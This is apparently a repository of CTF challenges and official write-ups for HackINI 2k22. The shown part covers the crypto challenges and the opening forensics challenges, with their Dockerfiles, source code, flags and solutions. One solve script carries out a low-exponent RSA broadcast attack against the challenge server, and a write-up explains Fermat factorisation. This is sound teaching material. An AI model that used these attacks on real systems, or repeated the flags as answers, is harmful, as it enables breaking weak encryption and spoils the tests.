├── README.md ├── crypto ├── 1by1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge.zip │ ├── challenge │ │ └── challenge.py │ ├── docker-compose.yml │ ├── entrypoint.sh │ ├── requirements.txt │ └── solution │ │ └── solve.py ├── NightCoder │ ├── README.md │ ├── challenge.py │ ├── challenge.yml │ └── solution │ │ └── README.md ├── README.md ├── RSimple │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── RSimple.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── sol.py ├── Steam_Locomotive │ ├── README.md │ ├── challenge.yml │ ├── enc │ └── solution │ │ └── README.md └── neighbors │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall │ ├── challenge.py │ └── flag │ └── solution │ ├── README.md │ └── solve.py ├── forensics ├── Backup_1 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── decipher.png │ │ └── rot13.png ├── Backup_2 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── oletool.png │ │ └── pptm.png ├── Investigator_1 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Investigator_2 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Investigator_3 │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── README.md ├── Smurf │ ├── README.md │ ├── challenge.yml │ ├── smurf.pcapng │ └── solution │ │ ├── README.md │ │ ├── id.png │ │ └── rickroll.png ├── agentDNS │ ├── README.md │ ├── capture.pcapng │ ├── challenge.yml │ └── solution │ │ └── README.md ├── ezCap │ ├── README.md │ ├── challenge.yml │ ├── ezCap.pcapng │ └── solution │ │ ├── README.md │ │ ├── filter1.png │ │ └── flag.png └── lies │ ├── README.md │ ├── challenge.yml │ ├── pic.jpeg │ └── solution │ └── README.md ├── jail ├── JsandboxS │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .passwd │ │ ├── entrypoint.sh │ │ └── script.js │ ├── docker-compose.yml │ └── 
solution │ │ └── README.md ├── README.md ├── baby-jail1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── baby-jail2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── correct │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.py │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ ├── wrapper │ │ └── wrapper.c │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── escape │ ├── challenge.yml │ └── solution │ │ └── README.md ├── less_jail │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── fakeflag │ │ ├── my_less │ │ ├── perms │ │ └── real_flag │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── pickle-games-1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pickle-games-2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pickle-games-3 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.py │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── solve.py ├── pyjail │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ ├── entrypoint.sh │ │ └── flag.txt │ ├── docker-compose.yml │ └── solution │ │ └── README.md └── pyjail2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall.py │ ├── flag.txt │ ├── sshd_config │ └── sudoers │ ├── docker-compose.yml │ └── solution │ └── 
README.md ├── linux ├── README.md ├── diff │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── flag.txt │ │ ├── sshd_config │ │ └── sudoers │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── images │ │ ├── cap1.png │ │ ├── cap2.png │ │ ├── cap3.png │ │ └── cap4.png ├── loca-loca-1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── client.py │ │ ├── entrypoint.sh │ │ ├── flag.runme │ │ └── server.py │ ├── docker-compose.yml │ ├── requirements.txt │ └── solution │ │ └── README.md ├── loca-loca-2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── client.py │ │ ├── entrypoint.sh │ │ ├── flag.runme │ │ └── server.py │ ├── docker-compose.yml │ ├── requirements.txt │ └── solution │ │ └── README.md ├── nutshell1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell1 │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── nutshell2 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell2 │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── nutshell_supreme │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag │ │ └── nutshell_supreme │ ├── docker-compose.yml │ └── solution │ │ └── README.md ├── remote │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .bashrc │ │ ├── flag.txt │ │ └── sshd_config │ ├── docker-compose.yml │ └── solution │ │ └── README.md └── welcome │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── 01-custom │ ├── sshd_config │ └── sudoers │ ├── docker-compose.yml │ └── solution │ ├── README.md │ └── images │ ├── cap1.png │ └── cap2.png ├── misc ├── Alien │ ├── Alien.png │ ├── README.md │ ├── challenge.yml │ └── solution │ │ └── README.md ├── Enigma │ ├── README.md │ ├── challenge.yml │ └── solution │ │ ├── README.md │ │ ├── 
blue.png │ │ ├── etcetra.png │ │ ├── flag.png │ │ ├── gimp.png │ │ ├── lock.png │ │ ├── morse.png │ │ └── vig.png ├── README.md ├── hello_word │ ├── README.md │ ├── challenge.yml │ ├── presentation.docx │ └── solution │ │ └── README.md └── imageData │ ├── README.md │ ├── challenge.yml │ ├── imageData.json │ └── solution │ └── README.md ├── programming ├── README.md ├── RPS │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge.py │ │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ │ └── solve.py ├── chess.INI │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── .passwd │ │ ├── challenge.py │ │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ │ ├── README.md │ │ └── sol.py └── zero-to-hero │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── chall.py │ └── entrypoint.sh │ ├── docker-compose.yml │ └── solution │ └── solve.py ├── pwn ├── B0F0 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge │ │ ├── challenge.c │ │ ├── entrypoint.sh │ │ └── flag │ ├── docker-compose.yml │ ├── solution │ │ └── script.py │ └── src │ │ └── challenge.c ├── B0F1 │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── challenge │ │ ├── challenge.c │ │ ├── entrypoint.sh │ │ └── flag │ ├── docker-compose.yml │ ├── solution │ │ └── script.py │ └── src │ │ └── challenge.c ├── README.md ├── no-way-out │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── entrypoint.sh │ │ ├── flag.txt │ │ └── no-way-out │ ├── docker-compose.yml │ ├── lib │ │ ├── ld-2.27.so │ │ └── libc-2.27.so │ ├── solution │ │ └── README.md │ └── src │ │ ├── Makefile │ │ └── no-way-out.c └── stronk-boi │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── entrypoint.sh │ ├── flag.txt │ └── stronk-boi │ ├── docker-compose.yml │ ├── lib │ ├── ld-2.27.so │ └── libc-2.27.so │ ├── solution │ ├── README.md │ ├── ld-2.27.so │ ├── 
libc-2.27.so │ ├── libc.so.6 │ ├── solve.py │ ├── stronk-boi │ └── stronk-boi_patched │ └── src │ ├── Makefile │ └── stronk-boi.c ├── reverse ├── 6pack │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ └── challenge.exe │ ├── solution │ │ └── README.md │ └── source │ │ ├── source.c │ │ └── source.exe ├── README.md ├── baby-asm │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall │ │ ├── chall.asm │ │ ├── chall.o │ │ ├── enc │ │ └── flag.txt │ └── soultion │ │ ├── README.md │ │ └── solve.py └── magic │ ├── README.md │ ├── challenge.yml │ └── challenge │ ├── chall │ ├── chall.c │ └── pychall.py ├── warmup ├── README.md ├── my-first-ncat │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ │ ├── chall.sh │ │ └── entrypoint.sh │ └── docker-compose.yml └── my-first-ssh │ ├── Dockerfile │ ├── README.md │ ├── challenge.yml │ ├── challenge │ ├── entrypoint.sh │ ├── flag.txt │ └── sshd_config │ └── docker-compose.yml └── web ├── HEADache ├── Dockerfile ├── README.md ├── app │ ├── app.py │ ├── requirements.txt │ ├── static │ │ ├── bulma.min.css │ │ └── meme.png │ └── templates │ │ ├── css │ │ └── bulma.min.css │ │ └── index.html ├── challenge.yml ├── docker-compose.yml └── solution │ └── README.md ├── README.md ├── baby-lfi-2 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── baby-lfi ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── challenge-creator ├── Dockerfile ├── README.md ├── app │ ├── .dockerignore │ ├── .env │ ├── dev.env │ ├── index.js │ ├── package-lock.json │ ├── package.json │ ├── views │ │ ├── pages │ │ │ └── index.ejs │ │ └── partials │ │ │ └── head.ejs │ └── visiter.js ├── challenge.yml ├── docker-compose.yml └── solution │ ├── README.md │ ├── evil.js │ └── exploit.js ├── lfi ├── 
Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── en.php │ ├── fr.php │ ├── index.php │ └── main.css ├── docker-compose.yml └── solution │ └── README.md ├── nextgen-1 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── apps │ │ ├── main-app │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ ├── static │ │ │ │ ├── js │ │ │ │ │ └── main.js │ │ │ │ └── styles │ │ │ │ │ └── css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── stylesheet.css │ │ │ └── templates │ │ │ │ ├── base.html │ │ │ │ ├── error-404.html │ │ │ │ ├── error-500.html │ │ │ │ ├── index.html │ │ │ │ └── navigation.html │ │ ├── service1 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ │ └── summary.html │ │ └── service2 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ └── summary.html │ ├── flag.txt │ ├── requirements.txt │ └── wsgi-apps.conf ├── docker-compose.yml └── solution │ ├── README.md │ └── images │ ├── cap1.png │ ├── cap2.png │ ├── cap3.png │ ├── cap4.png │ ├── cap5.png │ └── cap6.png ├── nextgen-2 ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── apps │ │ ├── main-app │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ ├── static │ │ │ │ ├── js │ │ │ │ │ └── main.js │ │ │ │ └── styles │ │ │ │ │ └── css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── stylesheet.css │ │ │ └── templates │ │ │ │ ├── base.html │ │ │ │ ├── error-404.html │ │ │ │ ├── error-500.html │ │ │ │ ├── index.html │ │ │ │ └── navigation.html │ │ ├── service1 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ │ └── summary.html │ │ └── service2 │ │ │ ├── app.py │ │ │ ├── app.wsgi │ │ │ └── templates │ │ │ └── summary.html │ ├── filters │ ├── flag.txt │ ├── requirements.txt │ └── wsgi-apps.conf ├── docker-compose.yml └── solution │ ├── README.md │ └── images │ └── cap1.png ├── whois-fixed ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge │ ├── index.html │ └── query.php ├── docker-compose.yml ├── flag.txt └── solution │ ├── README.md │ ├── 
payload_test_capture.png │ ├── php_doc_capture.png │ └── php_test_capture.png └── whois ├── Dockerfile ├── README.md ├── challenge.yml ├── challenge ├── index.html └── query.php ├── docker-compose.yml ├── flag.txt └── solution └── README.md

/README.md:
--------------------------------------------------------------------------------
# HackINI 2k22 CTF

## About

This repository contains CTF challenges and official write-ups for HackINI 2k22 CTF.
--------------------------------------------------------------------------------
/crypto/1by1/Dockerfile:
--------------------------------------------------------------------------------
FROM ubuntu:20.04

# Update Ubuntu image
RUN apt-get update && apt-get upgrade -y

# Setup challenge environment
RUN apt-get install -y socat python3 python3-pip --no-install-recommends
RUN python3 -m pip install pycryptodome pycryptodomex

# Add new user "ctf:ctf"
RUN useradd -m -d /home/ctf -s /bin/bash ctf
RUN echo 'ctf:ctf' | chpasswd

# Change directory to the newly created user's directory
WORKDIR /home/ctf/

EXPOSE 8000

COPY ./entrypoint.sh /home/ctf
COPY ./challenge/challenge.py /home/ctf
RUN chmod +x /home/ctf/entrypoint.sh
RUN chmod +x /home/ctf/challenge.py

CMD ["/home/ctf/entrypoint.sh"]
--------------------------------------------------------------------------------
/crypto/1by1/README.md:
--------------------------------------------------------------------------------
# 1by1

**`Author:`** [m0kr4n3](https://github.com/m0kr4n3)

## Description

> It is proven that with only 3 steps, we can retrieve the flag
> I dare you to do it

**Connect with**: nc \[host\] \[port\]

[challenge.py](./challenge.zip)

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/crypto/1by1/challenge.yml:
--------------------------------------------------------------------------------
name: "1by1"
author: "m0kr4n3"
author_link: "https://github.com/m0kr4n3"

category: crypto
difficulty: hard

description: |
  > It is proven that with only 3 steps, we can retrieve the flag
  > I dare you to do it

  **Author**: m0kr4n3

connection_info: ncat -v --ssl byte-by-byte.challs.shellmates.club 443


value: 500
type: dynamic

extra:
  initial: 500
  decay: 8
  minimum: 50

flags:
  - shellmates{1_h0p3_y0u_r3tr13v3d_th3_1V_4nd_3ncrypt3d_477_p0551b73_ch4r5}

files:
  - ./challenge.zip

tags:
  - hard


state: visible

version: "0.1"
--------------------------------------------------------------------------------
/crypto/1by1/challenge.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/crypto/1by1/challenge.zip
--------------------------------------------------------------------------------
/crypto/1by1/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3"

services:
  1by1:
    build: .
    ports:
      - "1337:8000"
--------------------------------------------------------------------------------
/crypto/1by1/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/bash

socat -dd -T60 TCP-LISTEN:8000,reuseaddr,fork,su=ctf EXEC:/home/ctf/challenge.py,stderr
--------------------------------------------------------------------------------
/crypto/1by1/requirements.txt:
--------------------------------------------------------------------------------
pycryptodome==3.14.1
--------------------------------------------------------------------------------
/crypto/NightCoder/README.md:
--------------------------------------------------------------------------------
# Night Coder

**`Author:`** [Chih3b](https://github.com/Ch1h3b)

## Description

I am a night coder, are you?

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/crypto/NightCoder/challenge.py:
--------------------------------------------------------------------------------
import random
import datetime
from secret import flag


# I'm a night coder, I coded this at night (Thursday morning)

def seed_shuffler(my_list, seed):
    random.seed(seed)
    random.shuffle(my_list)
    return my_list

seed=int(datetime.datetime.now().strftime('%Y%m%d%H%M'))

flag = [f for f in flag]
enc = seed_shuffler(flag,seed)

print("".join(enc))

#result at that time: "N_gs{aesD_he_3AtrsOLlh3ROT1sECRl0m}s"
--------------------------------------------------------------------------------
/crypto/README.md:
--------------------------------------------------------------------------------
# Crypto

This directory contains challenges related to the `Crypto` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.
--------------------------------------------------------------------------------
/crypto/RSimple/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.10

RUN apt-get update && \
    apt-get install -y socat

RUN adduser --disabled-password --no-create-home ctf
RUN /usr/local/bin/python -m pip install --upgrade pip
RUN pip install gmpy2 pycryptodome

COPY challenge /challenge/

WORKDIR /challenge

RUN chmod +x RSimple.py entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
--------------------------------------------------------------------------------
/crypto/RSimple/README.md:
--------------------------------------------------------------------------------
# RSimple

**`Author:`** [badsUwU](https://github.com/abdelmaoo)

## Description

I created this unbreakable RSA application, go ahead and try to hack me

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/crypto/RSimple/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

USER="ctf"
EXEC="/challenge/RSimple.py"
PORT=1337

socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER"
--------------------------------------------------------------------------------
/crypto/RSimple/challenge/flag.py:
--------------------------------------------------------------------------------
FLAG = b'shellmates{who_7h0UghT_ThA7_RSa_w0ULd_B3_tHAT_3ASy_t0_BREAK}'
--------------------------------------------------------------------------------
/crypto/RSimple/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.3"
services:
  server:
    build: .
    ports:
      - '1337:1337'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          cpus: '2'
          memory: 50M
    healthcheck:
      test: socat - TCP4:localhost:1337 || exit 1
      interval: 60s
      timeout: 2s
      retries: 5
--------------------------------------------------------------------------------
/crypto/RSimple/solution/README.md:
--------------------------------------------------------------------------------
# RSimple

## Write-up

[link](https://crypto.stackexchange.com/questions/6713/low-public-exponent-attack-for-rsa?rq=1#)

Check the solution script: [script](./sol.py)

## Flag

`shellmates{who_7h0UghT_ThA7_RSa_w0ULd_B3_tHAT_3ASy_t0_BREAK}`
--------------------------------------------------------------------------------
/crypto/RSimple/solution/sol.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
from pwn import *
from gmpy2 import iroot
from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
import math

s = remote('rsimple.challs.shellmates.club',443,ssl=True)

# Number of (modulus, ciphertext) pairs to collect; matches the root taken below
r = 17

n = [None]*r
c = [None]*r
t = [None]*r

# Request r encryptions and parse the modulus and ciphertext from each reply
for i in range(r):
    s.recvuntil(b'>> ')
    s.sendline(b'3')
    s.recvline()
    p=s.recvline()
    n[i] = int(p.split(b' ')[6])
    p = s.recvline()
    c[i] = int(p.split(b' ')[4][:-1].decode())

# Chinese Remainder Theorem: combine the residues c[i] mod n[i]
for i in range(r):
    N = math.prod([n[j] for j in list(set(range(r))-{i})])
    t[i] = c[i]*N*inverse(N,n[i])

c = sum(t)%math.prod(n)

# The combined value is an exact 17th power over the integers
print(long_to_bytes(iroot(c,17)[0]))

s.close()
--------------------------------------------------------------------------------
/crypto/Steam_Locomotive/README.md:
--------------------------------------------------------------------------------
# Steam Locomotive

**`Author:`** [badsUwU](https://github.com/abdelmaoo)

## Description

I wrote a message, but a train passed and messed it up, can you recover it?
`siaaani ceusocnln ieosStsreLmvIoi tit t.rsul ltuLol_T3n7_i7}lDsly nmtosamdt orc sr h cietlyetrs nta fl. Lsad o ta oooie tsmtmslssdrcoycnet eei orfa:selae{$_$Nt$_0L$_h_o7n_f4dRC0Y psii eortewada elsd nfSmct. eei eronH y ghmse__tI7cE0_Er`

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/crypto/Steam_Locomotive/enc:
--------------------------------------------------------------------------------
siaaani ceusocnln ieosStsreLmvIoi tit t.rsul ltuLol_T3n7_i7}lDsly nmtosamdt orc sr h cietlyetrs nta fl. Lsad o ta oooie tsmtmslssdrcoycnet eei orfa:selae{$_$Nt$_0L$_h_o7n_f4dRC0Y psii eortewada elsd nfSmct. eei eronH y ghmse__tI7cE0_Er
--------------------------------------------------------------------------------
/crypto/Steam_Locomotive/solution/README.md:
--------------------------------------------------------------------------------
# Steam Locomotive

## Write-up

The description hints at the `sl` command, which shows a steam locomotive on the terminal; googling "train cipher" gives `Rail fence cipher`.

## Flag

`shellmates{u$e_L$_Not_$l_t0_LI$T_7h3_con7En7_0f_4_diREC70rY}`
--------------------------------------------------------------------------------
/crypto/neighbors/README.md:
--------------------------------------------------------------------------------
# neighbors

**`Author:`** [ouxs](https://github.com/ouxs-19)

## Description

> They say it's such a rookie mistake to do.
> Can you find it?

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/crypto/neighbors/challenge.yml:
--------------------------------------------------------------------------------
name: "neighbors"
author: "Ouxs"
author_link: "https://github.com/ouxs-19/"
category: crypto

difficulty: ez-med
description: |
  > They say it's such a rookie mistake to do.
  > Can you find it?
  **Author** : Ouxs

flags:
  - shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN}

files:
  - challenge/chall
  - challenge/challenge.py

value: 500
type: dynamic
extra:
  initial: 500
  decay: 15
  minimum: 50

tags:
  - easy/medium

state: visible
version: "0.1"
--------------------------------------------------------------------------------
/crypto/neighbors/challenge/challenge.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

from gmpy2 import next_prime
from Crypto.Util import number

p = number.getPrime(2048)
q = next_prime(p)

e = 0x10001
N = p * q

with open("flag", "rb") as f:
    flag = number.bytes_to_long(f.read())

C = pow(flag, e, N)

with open("chall", "w") as f:
    f.write("\n".join([f"N : {N}", f"e : {e}", f"C : {C}"]))
--------------------------------------------------------------------------------
/crypto/neighbors/challenge/flag:
--------------------------------------------------------------------------------
shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN}
--------------------------------------------------------------------------------
/crypto/neighbors/solution/README.md:
--------------------------------------------------------------------------------
# byte_by_byte

## Write-up

If we check the source code, we can see that the way the `q` is generated is a bit weird.

q is the prime number following p. With this setup, the difference between `p` and `q` is generally small. So how can we break this?

This is a direct application of Fermat's factorization method:

Every odd number can be written in this format: `n = a^2-b^2 --> n = (a-b)*(a+b) --> p = a-b , q = a+b`

If the difference between `p` and `q` is small, then `b` is small and `a` is close to the square root of `n`, so we can easily brute force them by choosing a value for `a` then checking if `a^2-n` is a square number.

We start the search for `a` at the square root of `n`.

## Flag

`shellmates{F3RM47_H4S_Ju57_T0Ok_R$A_D0WN}`
--------------------------------------------------------------------------------
/forensics/Backup_1/README.md:
--------------------------------------------------------------------------------
# Backup 1

**`Author:`** [Elghazali](https://github.com/Elghazali-99)

## Description

Eva, a university student who is a victim of a ransomware threat, contacted us asking for help. Fortunately, we found a recovery point on her system;
after rolling back to this point, we made a full disk image for analysis. Before we start questioning Eva about this accident: there is a weird document file with an uncommon extension on her computer. Try to find it, then decipher the hidden message.

Image link: https://bit.ly/3NCyiFX

## Solution

Solution of the challenge can be found [here](solution/).
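
Added example, not part of the repository: the `neighbors` write-up above (`/crypto/neighbors/solution/README.md`) depends on `p` and `q` being adjacent primes. The sketch below audits a prime pair with a bounded Fermat search and the FIPS 186-4 (Appendix B.3) minimum-distance rule `|p - q| > 2^(nlen/2 - 100)`. It uses constructed 1024-bit primes instead of the challenge's 2048-bit ones, and all function names are chosen for this illustration.

```python
import math

# Small primes: cheap trial division, and the first 16 double as Miller-Rabin bases.
SMALL_PRIMES = [p for p in range(2, 1000)
                if all(p % d for d in range(2, math.isqrt(p) + 1))]


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases (probabilistic for large n; fine for a demo)."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in SMALL_PRIMES[:16]:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # no square reached n - 1: definitely composite
    return True


def next_prime(n: int) -> int:
    """Smallest probable prime greater than n (stand-in for gmpy2.next_prime)."""
    c = n + 1
    if c <= 2:
        return 2
    if c % 2 == 0:
        c += 1
    while not is_probable_prime(c):
        c += 2
    return c


def fermat_factor(n: int, max_steps: int = 10_000):
    """Bounded Fermat search on odd n: find a such that a*a - n is a perfect square.

    Returns (p, q, steps) with p <= q, or None if max_steps is exhausted.
    """
    a = math.isqrt(n)
    if a * a < n:
        a += 1  # start at ceil(sqrt(n))
    for step in range(1, max_steps + 1):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b, step
        a += 1
    return None


def fips_distance_ok(p: int, q: int) -> bool:
    """Key-generation check from FIPS 186-4 B.3: |p - q| > 2^(nlen/2 - 100)."""
    nlen = 2 * max(p.bit_length(), q.bit_length())  # nominal modulus length
    return abs(p - q) > (1 << (nlen // 2 - 100))


def audit_pair(p: int, q: int, max_steps: int = 10_000) -> dict:
    """Report whether a prime pair survives both checks."""
    found = fermat_factor(p * q, max_steps)
    return {
        "fips_distance_ok": fips_distance_ok(p, q),
        "fermat_steps": found[2] if found else None,
        "recovered": found is not None and {found[0], found[1]} == {p, q},
    }


def demo():
    # Constructed inputs: 1024-bit primes derived from fixed starting points.
    p = next_prime(1 << 1023)
    weak = audit_pair(p, next_prime(p))  # q chosen as in challenge.py
    strong = audit_pair(p, next_prime((1 << 1023) + (1 << 1000)))
    return weak, strong


if __name__ == "__main__":
    weak, strong = demo()
    print("adjacent primes :", weak)
    print("separated primes:", strong)
```

With adjacent primes the search succeeds on its first candidate because `b^2 < 2a - 1`, so `ceil(sqrt(n))` is already `a`; the same holds at the challenge's key size.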
--------------------------------------------------------------------------------
/forensics/Backup_1/solution/README.md:
--------------------------------------------------------------------------------
# Backup 1

## Write-up

`Users/PC/Documents/ROT.13`

![IMG](rot13.png)


![IMG](decipher.png)

## Flag

`shellmates{th1s_1s_just_th3_st4rt}`
--------------------------------------------------------------------------------
/forensics/Backup_1/solution/decipher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_1/solution/decipher.png
--------------------------------------------------------------------------------
/forensics/Backup_1/solution/rot13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_1/solution/rot13.png
--------------------------------------------------------------------------------
/forensics/Backup_2/README.md:
--------------------------------------------------------------------------------
# Backup 2

**`Author:`** [Elghazali](https://github.com/Elghazali-99)

## Description
After talking with Eva, she said: "I had homework about Industry 4.0 and IoT. Luckily, I found a ready presentation about it. First
I checked its content and changed some slides, then the next day, after turning on my PC, a text file popped up telling me to pay $1337 to decrypt my files. I don't know what to do. There are many important files on my hard drive. Please help!"
Your mission as a cybersecurity analyst is to investigate and uncover evidence of this malicious attack by identifying and reporting the threat characteristics,
which are:
- The domain name from which the ransomware was downloaded: "Domain.xyz"
- Ransomware's name: "name.extension"
- The masqueraded name of the malware: "masqueraded.extension"

>Flag format: shellmates{domain.xyz_name.extension_masqueraded.extension}

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/forensics/Backup_2/solution/README.md:
--------------------------------------------------------------------------------
# Backup 2

## Write-up

Eva was attacked by ransomware after downloading the slides, which means the ransomware was initiated by macros.

1. Using Autopsy, extract the PowerPoint file from Downloads:

![IMG](pptm.png)

2. Examine the file using `Ole Tools`:
```code
olevba industry.pptm
```


![IMG](oletool.png)

## Flag

`shellmates{H4ck3r.com_d1rT00l.exe_svchost.exe}`
--------------------------------------------------------------------------------
/forensics/Backup_2/solution/oletool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_2/solution/oletool.png
--------------------------------------------------------------------------------
/forensics/Backup_2/solution/pptm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Backup_2/solution/pptm.png
--------------------------------------------------------------------------------
/forensics/Investigator_1/README.md:
--------------------------------------------------------------------------------
# Investigator 1

**`Author:`** [Chih3b](https://github.com/Ch1h3b)

## Description

The headmaster's computer has been attacked! You, as a professional forensic investigator, did a memory dump of the attacked machine; it's now time to do the investigation!
First, retrieve the username and the password of the machine.
Flag format: shellmates{username:password}
Note: the same memory dump is required for the three Investigator challenges.
Link to chall file: https://drive.google.com/file/d/1mh5HFljVskRgJ0HQxRmIBhtPxCY1GJc2/view?usp=sharing

## Solution

Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
